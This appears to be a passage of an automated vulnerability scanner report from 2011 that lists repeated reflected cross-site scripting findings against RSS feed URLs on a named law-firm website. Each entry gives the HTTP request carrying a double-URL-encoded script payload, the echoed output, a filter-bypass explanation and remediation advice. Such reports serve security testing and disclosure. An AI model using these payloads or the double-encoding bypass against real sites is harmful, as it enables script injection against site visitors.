GET /rss/practices/International_Trade/rss.xmleb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1 was submitted in the REST URL parameter 1. This input was echoed as 2cd05"><script>alert(1)</script>4aa15667da1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1/practices/Litigation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba was submitted in the REST URL parameter 2. This input was echoed as 2c84a"><script>alert(1)</script>d9dfe2363ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba/Litigation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86 was submitted in the REST URL parameter 3. This input was echoed as 191ff"><script>alert(1)</script>238461b7a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Litigation191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d was submitted in the REST URL parameter 4. This input was echoed as 14505"><script>alert(1)</script>478d1333f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Litigation/rss.xml14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42 was submitted in the REST URL parameter 1. This input was echoed as dc84f"><script>alert(1)</script>79d0e014d42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssdc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42/practices/Postal/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38 was submitted in the REST URL parameter 2. This input was echoed as 4a669"><script>alert(1)</script>6384682ca38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38/Postal/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b was submitted in the REST URL parameter 3. This input was echoed as e6c53"><script>alert(1)</script>2206f6e398b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Postale6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 was submitted in the REST URL parameter 4. This input was echoed as 5a1f6"><script>alert(1)</script>af2258d21b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Postal/rss.xml5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b was submitted in the REST URL parameter 1. This input was echoed as 35e2f"><script>alert(1)</script>69c57b225b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b/practices/Privacy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb was submitted in the REST URL parameter 2. This input was echoed as 38e63"><script>alert(1)</script>99d2689ecdb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb/Privacy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0 was submitted in the REST URL parameter 3. This input was echoed as 5a06f"><script>alert(1)</script>ae4d6666dc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Privacy5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be was submitted in the REST URL parameter 4. This input was echoed as 4256c"><script>alert(1)</script>823dd7739be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Privacy/rss.xml4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f was submitted in the REST URL parameter 1. This input was echoed as ab6ad"><script>alert(1)</script>3058a7872f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f/practices/Professional_Liability/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13 was submitted in the REST URL parameter 2. This input was echoed as b635c"><script>alert(1)</script>bb61d6adb13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesb635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13/Professional_Liability/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf was submitted in the REST URL parameter 3. This input was echoed as 7b62f"><script>alert(1)</script>209c75ecebf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Professional_Liability7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 was submitted in the REST URL parameter 4. This input was echoed as a3cc2"><script>alert(1)</script>842ba8b7f27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Professional_Liability/rss.xmla3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7 was submitted in the REST URL parameter 1. This input was echoed as 43538"><script>alert(1)</script>239e5feec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7/practices/Public_Policy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80 was submitted in the REST URL parameter 2. This input was echoed as 95bab"><script>alert(1)</script>4f44ea70a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80/Public_Policy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123 was submitted in the REST URL parameter 3. This input was echoed as bf26f"><script>alert(1)</script>e7d3032f123 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
